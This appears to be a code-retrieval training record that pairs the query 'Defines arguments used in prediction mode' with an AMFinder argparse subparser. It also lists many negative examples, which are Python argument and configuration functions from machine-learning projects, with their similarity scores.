context.set_context(mode=context.GRAPH_MODE, device_target=args.platform, save_graphs=args.save_graphs)\r\n context.reset_auto_parallel_context()\r\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,\r\n device_num=args.device_num)\r\n init()\r\n args.rank = get_rank()\r\n args.save_checkpoint_path = os.path.join(args.save_checkpoint_path, \"ckpt_\" + str(args.rank))\r\n else:\r\n context.set_context(mode=context.GRAPH_MODE, device_target=args.platform, device_id=args.device_id,\r\n save_graphs=args.save_graphs, save_graphs_path=\"naml_ir\")\r\n args.rank = 0\r\n args.device_num = 1\r\n args.phase = phase\r\n cfg = get_dataset_config(args.dataset)\r\n args.n_categories = cfg.n_categories\r\n args.n_sub_categories = cfg.n_sub_categories\r\n args.n_words = cfg.n_words\r\n if phase == \"train\":\r\n args.epochs = cfg.epochs if args.epochs is None else args.epochs * math.ceil(args.device_num ** 0.5)\r\n args.lr = cfg.lr if args.lr is None else args.lr\r\n args.print_times = cfg.print_times if args.print_times is None else args.print_times\r\n args.embedding_file = cfg.embedding_file.format(args.dataset_path)\r\n args.word_dict_path = cfg.word_dict_path.format(args.dataset_path)\r\n args.category_dict_path = cfg.category_dict_path.format(args.dataset_path)\r\n args.subcategory_dict_path = cfg.subcategory_dict_path.format(args.dataset_path)\r\n args.uid2index_path = cfg.uid2index_path.format(args.dataset_path)\r\n args.train_dataset_path = cfg.train_dataset_path.format(args.dataset_path)\r\n args.eval_dataset_path = cfg.eval_dataset_path.format(args.dataset_path)\r\n args_dict = vars(args)\r\n for key in args_dict.keys():\r\n print('--> {}:{}'.format(key, args_dict[key]), flush=True)\r\n return args", "def __init__(self, args):\n self.args = args\n\n self.batch_size = args.meta_batch_size\n self.test_batch_size = args.test_batch_size\n self.volume_size = args.volume_size\n self.n_class = args.n_class\n self.compactness_loss_weight = args.compactness_loss_weight\n self.smoothness_loss_weight = args.smoothness_loss_weight\n self.margin = args.margin\n\n self.forward = self.forward_unet\n self.construct_weights = self.construct_unet_weights\n self.seg_loss = _get_segmentation_cost\n self.get_compactness_cost = _get_compactness_cost", "def __init__(self):\n # Number of examples per epoch of training data.\n self.num_examples_per_epoch = None \n\n # Optimizer for training the model.\n self.optimizer = \"SGD\" #default \"SGD\"\n\n # Learning rate for the initial phase of training.\n self.initial_learning_rate = 2.0 # default 2.0\n self.learning_rate_decay_factor = 0.8\n self.num_epochs_per_decay = 4 #default 8\n\n # If not None, clip gradients to this value.\n self.clip_gradients = 5.0\n\n # How many model checkpoints to keep.\n self.max_checkpoints_to_keep = 2", "def configure_args(self):\n super(MRTextClassifier, self).configure_args()\n\n self.add_passthru_arg(\n '--min-df', dest='min_df', default=2, type=int,\n help=('min number of documents an n-gram must appear in for us to'\n ' count it. Default: %(default)s'))\n self.add_passthru_arg(\n '--max-df', dest='max_df', default=10000000, type=int,\n help=('max number of documents an n-gram may appear in for us to'\n ' count it (this keeps reducers from running out of memory).'\n ' Default: %(default)s'))\n self.add_passthru_arg(\n '--max-ngram-size', dest='max_ngram_size',\n default=DEFAULT_MAX_NGRAM_SIZE, type=int,\n help='maximum phrase length to consider')\n self.add_passthru_arg(\n '--stop-words', dest='stop_words',\n default=', '.join(DEFAULT_STOP_WORDS),\n help=(\"comma-separated list of words to ignore. For example, \"\n \"--stop-words 'in, the' would cause 'hole in the wall' to be\"\n \" parsed as ['hole', 'wall']. Default: %(default)s\"))\n self.add_passthru_arg(\n '--short-doc-threshold', dest='short_doc_threshold',\n type=int, default=None,\n help=('Normally, for each n-gram size, we take the average score'\n ' over all n-grams that appear. This allows us to penalize'\n ' short documents by using this threshold as the denominator'\n ' rather than the actual number of n-grams.'))\n self.add_passthru_arg(\n '--no-test-set', dest='no_test_set',\n action='store_true', default=False,\n help=(\"Choose about half of the documents to be the testing set\"\n \" (don't use them to train the classifier) based on a SHA1\"\n \" hash of their text\"))", "def buildbertargs(): # type: () -> ClassificationArgs\n\n accargs = ClassificationArgs()\n accargs.num_train_epochs = 5\n accargs.fp16 = False\n accargs.overwrite_output_dir = True\n accargs.evaluate_during_training = False\n accargs.sliding_window = True\n accargs.max_seq_length = 256\n accargs.stride = 0.9\n accargs.labels_list = [1, 0]\n accargs.save_model_every_epoch = False\n accargs.silent = True\n accargs.manual_seed = 18\n\n return accargs", "def parse_args():\n parser = argparse.ArgumentParser('GACM')\n parser.add_argument('--pretrain', action='store_true',\n help='pretrain the model')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--test', action='store_true',\n help='test the model')\n parser.add_argument('--rank', action='store_true',\n help='rank on train set')\n parser.add_argument('--rank_cheat', action='store_true',\n help='rank on train set in a cheating way')\n parser.add_argument('--generate_click_seq', action='store_true',\n help='generate click sequence based on model itself')\n parser.add_argument('--generate_click_seq_cheat', action='store_true',\n help='generate click sequence based on ground truth data')\n parser.add_argument('--generate_synthetic_dataset', action='store_true',\n help='generate synthetic dataset for reverse ppl')\n parser.add_argument('--use_gpu', action='store_true',\n help='use gpu instead of cpu')\n parser.add_argument('--gpu_num', type=int, default=1,\n help='gpu_num')\n parser.add_argument('--data_parallel', action='store_true',\n help='data_parallel')\n parser.add_argument('--dataset_version', type=int, default=1,\n help='version number of the dataset that is used')\n parser.add_argument('--agent_version', type=int, default=1,\n help='version number of the agent that is used')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='adam',\n help='optimizer type')\n train_settings.add_argument('--g_lr', type=float, default=0.001,\n help='learning rate of generator')\n train_settings.add_argument('--d_lr', type=float, default=0.01,\n help='learning rate of discriminator')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--momentum', type=float, default=0.99,\n help='momentum')\n train_settings.add_argument('--dropout_rate', type=float, default=0.5,\n help='dropout rate')\n train_settings.add_argument('--alpha', type=float, default=0.5,\n help='policy_surr')\n train_settings.add_argument('--beta', type=float, default=0.5,\n help='policy entropy')\n train_settings.add_argument('--gamma', type=float, default=0.99,\n help='discount factor')\n train_settings.add_argument('--tau', type=float, default=0.95,\n help='gae')\n train_settings.add_argument('--clip_epsilon', type=float, default=0.2,\n help='ppo')\n train_settings.add_argument('--batch_size', type=int, default=20,\n help='train batch size')\n train_settings.add_argument('--num_steps', type=int, default=200000,\n help='number of training steps')\n train_settings.add_argument('--num_train_files', type=int, default=1,\n help='number of training files')\n train_settings.add_argument('--num_dev_files', type=int, default=1,\n help='number of dev files')\n train_settings.add_argument('--num_test_files', type=int, default=1,\n help='number of test files')\n train_settings.add_argument('--num_label_files', type=int, default=1,\n help='number of label files')\n train_settings.add_argument('--minimum_occurrence', type=int, default=1,\n help='minimum_occurrence for NDCG')\n train_settings.add_argument('--g_step', type=int, default=4,\n help='generator is updated g_step times during one epoch')\n train_settings.add_argument('--d_step', type=int, default=1,\n help='synthetic trajectory is generated d_step times during one epoch')\n train_settings.add_argument('--k', type=int, default=1,\n help='discriminator is updated k times during one epoch')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--algo', default='GACM',\n help='choose the algorithm to use')\n model_settings.add_argument('--embed_size', type=int, default=100,\n help='size of the embeddings')\n model_settings.add_argument('--gru_hidden_size', type=int, default=64,\n help='size of LSTM hidden units')\n model_settings.add_argument('--critic_hidden_size', type=int, nargs='+', default=[64, 32],\n help='size of critic hidden units')\n model_settings.add_argument('--max_d_num', type=int, default=10,\n help='max number of docs in a session')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--train_dirs', nargs='+',\n default=['./data/train_per_query.txt'],\n help='list of dirs that contain the preprocessed train data')\n path_settings.add_argument('--dev_dirs', nargs='+',\n default=['./data/dev_per_query.txt'],\n help='list of dirs that contain the preprocessed dev data')\n path_settings.add_argument('--test_dirs', nargs='+',\n default=['./data/test_per_query.txt'],\n help='list of dirs that contain the preprocessed test data')\n path_settings.add_argument('--label_dirs', nargs='+',\n default=['data/human_label_for_GACM.txt'],\n help='list of dirs that contain the preprocessed label data')\n path_settings.add_argument('--human_label_dir', default='./data/human_label.txt',\n help='the dir to Human Label txt file')\n path_settings.add_argument('--load_dir', default='./outputs/models/',\n help='the dir to load models')\n path_settings.add_argument('--save_dir', default='./outputs/models/',\n help='the dir to save models')\n path_settings.add_argument('--result_dir', default='./outputs/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='./outputs/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_dir', default='./outputs/log/',\n help='path of the log file. If not set, logs are printed to console')\n\n path_settings.add_argument('--eval_freq', type=int, default=10,\n help='the frequency of evaluating on the dev set when training')\n path_settings.add_argument('--check_point', type=int, default=1000,\n help='the frequency of saving model')\n path_settings.add_argument('--patience', type=int, default=3,\n help='lr half when more than the patience times of evaluation\\' loss don\\'t decrease')\n path_settings.add_argument('--lr_decay', type=float, default=0.5,\n help='lr decay')\n path_settings.add_argument('--load_model', type=int, default=-1,\n help='load model at global step')\n path_settings.add_argument('--load_pretrain_model', type=int, default=-1,\n help='load the pretrained model at global step')\n\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--training', type=argparse.FileType(), default='./data/cdt.epe',\n help='epe file with training sentences.')\n parser.add_argument('--validation', type=argparse.FileType(), default='./data/cdd.epe',\n help='epe file with validation sentences.')\n parser.add_argument('--metrics', type=argparse.FileType(\"w\"), default=sys.stdout,\n help='where to output metrics computed on validation.')\n parser.add_argument('--mode', choices=['BASELINE', 'BASELINE_C', 'BASELINE_C_POS'], default='BASELINE',\n help='mode in which model is trained, C adds cue information, POS adds pos tags.')\n parser.add_argument('--arch', choices=['LSTM', 'GRU'], default='LSTM',\n help='which recurrent network architecture to use.')\n parser.add_argument('--word_vectors', default=None,\n help='file with word embeddings')\n parser.add_argument('--epochs', type=int, default=10,\n help='number of epochs to train the model.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='learning rate used in adam optimizer.')\n parser.add_argument('--max_len', type=int, default=100,\n help='maximum length of sentence.')\n parser.add_argument('--hidden_size', type=int, default=200,\n help='memory size of recurrent neural network.')\n parser.add_argument('--negations_only', action='store_true', default=False,\n help='if present, only sentences with at least one negation are used.')\n parser.add_argument('--tensorboard', action='store_true', default=False)\n parser.add_argument('--save', default=None, help='directory where to save model.')\n\n return parser.parse_args()", "def feed_evaluation_args(self):\n return {}", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"model_weights\", type=str,\n help=\"Path to the file with model weights.\")\n parser.add_argument(\"--save_dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--lr', type=float, default=0.001, help='set learning rate')\n parser.add_argument('--batch_size', type=int, default=16, help='set batch size')\n parser.add_argument('--epoch', type=int, default=20, help='set the epoches')\n parser.add_argument('--optimizer',type=str,default='adam', help='set the optimizer to use')\n parser.add_argument('--model',type=str,default='dnn', help='determine which model to use')\n parser.add_argument('--act',type=str,default='relu', help='determine which activation function to use')\n parser.add_argument('--loss_func',type=str,default='crossentropy', help='determine which loss function to use')\n parser.add_argument('--device',type=str,default='cuda',help='determine the device to use, set \\n--device cpu\\nif you do not want to use cuda')\n parser.add_argument('--checkpoints_path',type=str,default='./checkpoints', help=\"the path to save the model you have trained. Make sure it's valid.\")\n parser.add_argument('--data_path',type=str,default='./datasets', help=\"the path to download the mnist dataset or its location if you have download it, make sure it's valid\")\n return parser.parse_args()", "def parse_args():\n parser = ArgumentParser(description='Implicit Recommender')\n parser.add_argument('--path', type=Path, default=Path('../'), help='Input data path for train\\\\test')\n parser.add_argument('--train_fp', type=Path, default=Path('train.csv'), help='Train file name')\n parser.add_argument('--test_fp', type=Path, default=Path('test.csv'), help='Test file name')\n parser.add_argument('--epochs', type=int, default=2, help='Number of epochs')\n parser.add_argument('--bs', type=int, default=2048, help='Batch size')\n parser.add_argument('--layers', type=int, nargs='+', default=[32, 48, 32, 16],\n help='Size of each layer. The first layer is a concatenation of user and item embeddings. So '\n 'layers[0]/2 is the embedding size', )\n parser.add_argument('--weight_decay', type=float, default=0.00001, help='Regularization for each layer')\n parser.add_argument('--num_neg_train', type=int, default=200,\n help='Number of negative instances while training')\n parser.add_argument('--num_neg_test', type=int, default=20,\n help='Number of negative instances while testing') # doesn't work\n parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')\n parser.add_argument('--dropout', type=float, default=.1, help='Dropout prob after each dense layer')\n parser.add_argument('--learner', default='adam', choices=('adagrad', 'adam', 'rmsprop', 'sgd'),\n help='Specify an optimizer')\n parser.add_argument('--verbose', type=lambda x: str(x).lower() == 'true', default=True,\n help='Show performance per X iterations')\n parser.add_argument('--seed', type=int, default=33,\n help='Random state for all')\n parser.add_argument('--ckpt_callback_fp', type=Path, default=Path(datetime.today().strftime(\"%Y-%m-%d\")),\n help='Checkpoint callback filepath')\n parser.add_argument('--experiment_name', type=str, default=f'{datetime.today().strftime(\"%Y-%m-%d\")}',\n help='Experiment filepath')\n parser.add_argument('--map_item_id_name_fp', type=Path,\n default=Path(f'{datetime.today().strftime(\"%Y-%m-%d\")}_map_item_id_name_fp.json'), help='')\n return parser.parse_args()", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data" ]
[ "0.7736733", "0.7350229", "0.72321266", "0.72048527", "0.7092233", "0.6984818", "0.69702905", "0.6870562", "0.6834763", "0.6788515", "0.6737505", "0.6594925", "0.6524672", "0.6498421", "0.64617753", "0.64401156", "0.64344376", "0.643193", "0.64313674", "0.6415906", "0.64103043", "0.6370354", "0.63681483", "0.6361254", "0.63356185", "0.6327066", "0.6323624", "0.6317288", "0.6303118", "0.62908524", "0.62723184", "0.6268827", "0.6267587", "0.62293285", "0.622117", "0.620097", "0.6199103", "0.61918527", "0.61902916", "0.61848444", "0.6182543", "0.6182543", "0.6182543", "0.6182543", "0.6182543", "0.61794853", "0.6175855", "0.61739844", "0.61668205", "0.616228", "0.61538297", "0.6150711", "0.6137793", "0.6135971", "0.61281335", "0.61240864", "0.6121958", "0.6116249", "0.6113766", "0.6108102", "0.61074823", "0.6095049", "0.60812926", "0.6077155", "0.6074092", "0.6073565", "0.6070735", "0.6059552", "0.6058486", "0.6058134", "0.6056613", "0.6054622", "0.6035288", "0.6029786", "0.60263646", "0.6026173", "0.6021084", "0.60168725", "0.60167605", "0.60124385", "0.6006958", "0.6005426", "0.60042113", "0.599878", "0.5996425", "0.59829617", "0.5977419", "0.59773356", "0.59769094", "0.5974554", "0.5972411", "0.5970411", "0.5969379", "0.59673464", "0.5964597", "0.59609747", "0.5958474", "0.5955628", "0.595544", "0.5953783", "0.5945891" ]
0.0
-1
Defines arguments used in prediction mode.
def prediction_subparser(subparsers): parser = subparsers.add_parser('predict', help='Runs AMFinder in prediction mode.', formatter_class=RawTextHelpFormatter) x = PAR['tile_edge'] parser.add_argument('-t', '--tile_size', action='store', dest='edge', type=int, default=x, help='Tile size (in pixels) used for image segmentation.' '\ndefault value: {} pixels'.format(x)) parser.add_argument('-sr', '--super_resolution', action='store_const', dest='super_resolution', const=True, help='Apply super-resolution before predictions.' '\ndefault value: no super-resolution.') x = 'SRGANGenv1beta.h5' parser.add_argument('-g', '--generator', action='store', dest='generator', metavar='H5', type=str, default=x, help='name of the pre-trained generator.' '\ndefault value: {}'.format(x)) x = PAR['colormap'] parser.add_argument('-map', '--colormap', action='store', dest='colormap', metavar='id', type=str, default=x, help='Name of the colormap used to display conv2d outputs and kernels.' '\ndefault value: {}'.format(x)) x = 'CNN1v2.h5' parser.add_argument('-net', '--network', action='store', dest='model', metavar='H5', type=str, default=x, help='name of the pre-trained model to use for predictions.' '\ndefault value: {}'.format(x)) parser.add_argument('-so', '--save_conv2d_outputs', action='store_const', dest='save_conv2d_outputs', const=True, help='save conv2d outputs in a separate zip file.' '\ndefault value: False') parser.add_argument('-sk', '--save_conv2d_kernels', action='store_const', dest='save_conv2d_kernels', const=True, help='save convolution kernels in a separate zip file (takes time).' '\ndefault value: False') x = PAR['input_files'] parser.add_argument('image', nargs='*', default=x, help='plant root scan to be processed.' '\ndefault value: {}'.format(x)) return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_args(self, args: Namespace) -> None:\n self.epochs = args.epochs\n self.lrdecay = args.lrdecay\n self.lrpatience = args.lrpatience\n self.ntest = args.ntest\n self.ndiscard = args.ndiscard\n self.predict = args.predict\n self.printfreq = args.printfreq\n self.savefreq = args.savefreq\n self.resume = args.resume\n self.seed = args.seed\n self.timesteps = args.timesteps\n self.verbose = args.verbose", "def feed_training_args(self):\n return {}", "def predict_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('image', type = str, help = 'Path to the folder and file name of image to be checked') \n parser.add_argument('checkpoint', type = str, help = 'Checkpoint folder name') \n parser.add_argument('--gpu', type = bool, default = False, help = 'True = GPU enabled, False = GPU disabled') \n parser.add_argument('--topk', type = int, default = 5, help = 'Top number of class predicitions') \n parser.add_argument('--json', type = str, default = 'cat_to_name.json', help = 'Path to the folder and file name of JSON map used') \n return parser.parse_args()", "def predict_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('image_path',\n help=\"Path to the image file\")\n\n parser.add_argument('checkpoint',\n default='checkpoint.pth',\n help=\"Path to the model checkpoint\")\n\n parser.add_argument('--top_k',\n dest='top_k',\n default=5,\n help=\"Return top K most likely classes\",\n type=int)\n\n parser.add_argument('--category_names',\n dest='category_names',\n default='cat_to_name.json',\n help='Use a mapping of categories to real names: '\n )\n\n parser.add_argument('--gpu', action='store_true',\n dest='gpu',\n help='Activate GPU')\n\n result = parser.parse_args()\n\n return result", "def add_train_val_arguments(self):\n self.add_train_arguments()\n self.add_val_arguments()", "def define_parameters(self):", "def create_training_args(self, input_dict, output_dict, exec_properties,\n executor_class_path, training_inputs,\n job_id) -> Dict[Text, Any]:\n pass", "def set_arg_types( self ):\n if self.mode == 'grad':\n self.function = terms.dw_grad\n use_method_with_name( self, self.get_fargs_grad, 'get_fargs' )\n elif self.mode == 'div':\n self.function = terms.dw_div\n use_method_with_name( self, self.get_fargs_div, 'get_fargs' )\n else:\n self.function = self.d_eval\n use_method_with_name( self, self.get_fargs_eval, 'get_fargs' )\n self.use_caches = {'state_in_volume_qp' : [['parameter_s']],\n 'div_vector' : [['parameter_v']]}", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def parse_args(self):\n\n dict_args = dict()\n dict_args['hid'] = 64 # size of each hidden layer\n dict_args['l'] = 2 # number of layers\n\n dict_args['seed'] = 0 # Discard as this will cause identical results for PLA\n dict_args['cpu'] = 4 # MPI\n dict_args['exp_name'] = 'ppo'\n\n dict_args['epochs'] = 1000\n dict_args['steps_per_epoch'] = 25 # default 4000\n dict_args['pi_lr'] = 3e-4\n dict_args['vf_lr'] = 1e-3\n dict_args['train_pi_iters'] = 5 # default 80\n dict_args['train_v_iters'] = 5 # default 80\n dict_args['max_ep_len'] = 25 # default 1000, this needs to be the same as steps_per_epoch for Unity environment\n dict_args['target_kl'] = 0.01\n dict_args['clip_ratio'] = 0.2\n dict_args['lam'] = 0.97\n dict_args['gamma'] = 0.99\n dict_args['save_freq'] = 10\n dict_args['ac_kwargs'] = dict(hidden_sizes=[dict_args['hid']]*dict_args['l'])\n return dict_args", "def set_prediction_parameters(self, freq, prediction_length):\r\n self.freq = freq\r\n self.prediction_length = prediction_length", "def add_train_args(parser):\n\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--dataset', type=str, default=\"searchqa\",\n help='Dataset: searchqa, quasart or unftriviaqa')\n runtime.add_argument('--base_dir', type=str, default=\".\",\n help='base_dir of the pre-processing')", "def set_prediction_parameters(self, freq, prediction_length):\r\n self.__freq = freq\r\n self.__prediction_length = prediction_length", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def Args(parser):\n # TODO(user): move all flags definition to api_lib/ml/flags.py.\n parser.add_argument('job', help='Name of the batch prediction job.')\n parser.add_argument('--model', required=True, help='Name of the model.')\n parser.add_argument(\n '--version',\n help='Model version to be used. If unspecified, the default version '\n 'of the model will be used.')\n # input location is a repeated field.\n parser.add_argument(\n '--input-paths',\n type=arg_parsers.ArgList(min_length=1),\n required=True,\n help='Google Cloud Storage paths to the instances to run prediction on.'\n ' Wildcards accepted. Multiple paths can be specified if more than one '\n 'file patterns are needed. Example: '\n 'gs://my-bucket-0/instances0,gs://my-bucket-1/instances1')\n parser.add_argument(\n '--data-format',\n required=True,\n choices=['TEXT', 'TF_RECORD'],\n help='Data format of the input files.')\n parser.add_argument(\n '--output-path', required=True,\n help='Google Cloud Storage path to which to save the output. '\n 'Example: gs://my-bucket/output.')\n parser.add_argument(\n '--region',\n required=True,\n help='The Google Compute Engine region to run the job in.')", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def extra_target_arguments(self):\n return {}", "def preprocess_arguments(self, *args, **kwargs):\n return (args, kwargs)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"--train_set\", type=str, default=\"drill\",\n help=\"Number of classes to predict (including background).\")\n args = parser.parse_args()\n train_set = args.train_set\n\n #test_set = \"drill_11_test_scenes\"\n\n NUM_CLASSES = 8\n SAVE_DIR = './testing_softmax_output/'\n DATA_DIR = '/'\n DATA_LIST_PATH = '/home/peteflo/spartan/src/CorlDev/experiments/sixobjects_multi_test_scenes.txt.imglist.txtdownsampled10.txt'\n DATA_DIRECTORY = ''\n IGNORE_LABEL = 255\n RESTORE_FROM = './snapshots_' + train_set + '/model.ckpt-20000'\n \n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\n help=\"Number of classes to predict (including background).\")\n parser.add_argument(\"--save-dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n parser.add_argument(\"--data-list\", type=str, default=DATA_LIST_PATH,\n help=\"Path to the file listing the images in the dataset.\")\n parser.add_argument(\"--data-dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\n parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\n help=\"The index of the label to ignore during the training.\")\n parser.add_argument(\"--restore-from\", type=str, default=RESTORE_FROM,\n help=\"Where restore model parameters from.\")\n return parser.parse_args()", "def base_arguments(self):\n raise NotImplementedError()", "def feed_evaluation_args(self):\n return {}", "def add_train_arguments(self):\n parser = self.parser\n parser.add_argument(\"source_dir\", help=\"Directory containing test source images.\")\n parser.add_argument(\"target_dir\", help=\"Directory containing test target images.\")\n parser.add_argument(\"--batch_size\", \"-bs\", default=1, type=int, help=\"Batch size.\")\n parser.add_argument(\"--cycle_loss_weight\", \"-clw\", default=0, type=int, help=\"Cycle loss weight.\")\n parser.add_argument(\n \"--discriminator_architecture\", \"-d\", default=\"basic\",\n help=\"architecture of the discriminator ('basic' | 'N_layers')\"\n )\n parser.add_argument(\n \"--discriminator_filters\", \"-df\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the discriminator.\"\n )\n parser.add_argument(\n \"--n_frames_discriminator\", \"-dn\", type=int, default=0,\n help=\"Number of frames the sequence discriminators discriminate.\"\n )\n parser.add_argument(\n \"--discriminator_temporal_scales\", \"-dts\", type=int, default=1,\n help=\"Number of temporal scales in framerate sampling (= number of sequence discriminators).\"\n )\n parser.add_argument(\n \"--feature_matching_loss_weight\", \"-fmlw\", default=0, type=int, help=\"Loss weight of feature matching.\"\n )\n parser.add_argument(\n \"--flow_loss_weight\", \"-flw\", default=0, type=int, help=\"Loss weight of flow loss in vid2vid.\"\n )\n parser.add_argument(\n \"--gan_mode\", \"-gan\", default=\"lsgan\", help=\"type of the gan loss ('vanilla' | 'lsgan' | 'wgangp').\"\n )\n parser.add_argument(\n \"--init_epoch\", \"-ie\", default=0, type=int, help=\"If set, load models saved at a specific epoch.\"\n )\n parser.add_argument(\n \"--init_checkpoint_dir\", \"-i\",\n help=\"If set, initialize models from saved checkpoints in init_checkpoint_dir.\"\n )\n parser.add_argument(\n \"--log_every\", \"-le\", default=100, type=int, help=\"Log losses and images every log_every iterations.\"\n )\n parser.add_argument(\n \"--log_images_every\", \"-lie\", default=0, type=int,\n help=\"If specified, log images every log_images_every iterations, instead of every log_every iterations.\"\n )\n parser.add_argument(\"--load_height\", \"-lh\", type=int, default=0, help=\"image load height (before cropping).\")\n parser.add_argument(\"--l1_loss_weight\", \"-llw\", default=0, type=int, help=\"L1 loss weight.\")\n parser.add_argument(\"--learning_rate\", \"-lr\", default=0.0002, type=float, help=\"Learning rate.\")\n parser.add_argument(\"--load_width\", \"-lw\", type=int, default=0, help=\"Image load width (before cropping).\")\n parser.add_argument(\n \"--mask_loss_weight\", \"-mlw\", default=0, type=int, help=\"Loss weight of mask loss (weight loss) in vid2vid.\"\n )\n parser.add_argument(\"--num_epochs\", \"-ne\", default=10, type=int, help=\"Number of training epochs.\")\n parser.add_argument(\n \"--perceptual_loss_weight\", \"-plw\", default=0, type=int, help=\"Loss weight of perceptual (VGG19) loss.\"\n )\n parser.add_argument(\n \"--recycle_loss_weight\", \"-rclw\", default=0, type=int, help=\"Loss weight of recycle in RecycleGAN.\"\n )\n parser.add_argument(\n \"--recycle_predictor_architecture\", \"-rcp\", default=\"resnet_6blocks\",\n help=\"Architecture of RecycleGAN predictor. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--recycle_predictor_filters\", \"-rcpf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the RecycleGAN predictor.\"\n )\n parser.add_argument(\n \"--save_every\", \"-se\", default=1, type=int, help=\"Save model checkpoints every save_every epochs.\"\n )\n parser.add_argument(\n \"--spatial_scaling\", \"-ss\", default=[1], type=float, nargs='+',\n help=\"Set steps for spatial scaling.\\n\"\n \"I.e. [0.25, 0.5, 1] to train a model with width and height 256 on 64 > 128 > 256 images.\"\n )\n parser.add_argument(\"--timecycle_loss\", \"-tcl\", default=\"l1\", help=\"Timecycle loss ('l1' | 'l2')\")\n parser.add_argument(\"--timecycle_loss_weight\", \"-tclw\", default=0, type=int, help=\"Timecycle loss weight.\")\n parser.add_argument(\n \"--timecycle_motion_model_architecture\", \"-tcmm\", default=\"resnet_1blocks\",\n help=\"Architecture of Timecycle motion model. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--timecycle_motion_model_filters\", \"-tcmmf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the Timecycle motion model.\"\n )\n parser.add_argument(\n \"--timecycle_separate_motion_models\", \"-tcsmm\", action=\"store_true\",\n help=\"Set to use separate motion models for forward/backward predictions.\"\n )\n parser.add_argument(\n \"--timecycle_type\", \"-tct\", default=\"conditional\",\n help=\"Type of Timecycle ('conditional' | 'pingpong').\"\n )\n parser.add_argument(\n \"--timecycle_warp_loss_weight\", \"-tcwlw\", default=0, type=int, help=\"Timecycle warp loss weight.\"\n )\n parser.add_argument(\n \"--temporal_scaling\", \"-ts\", default=[1], type=float, nargs='+',\n help=\"Set steps for temporal scaling.\\n\"\n \"I.e. [0.2, 0.6, 1] to train a model with block_size 5 on 1 -> 3 -> 5 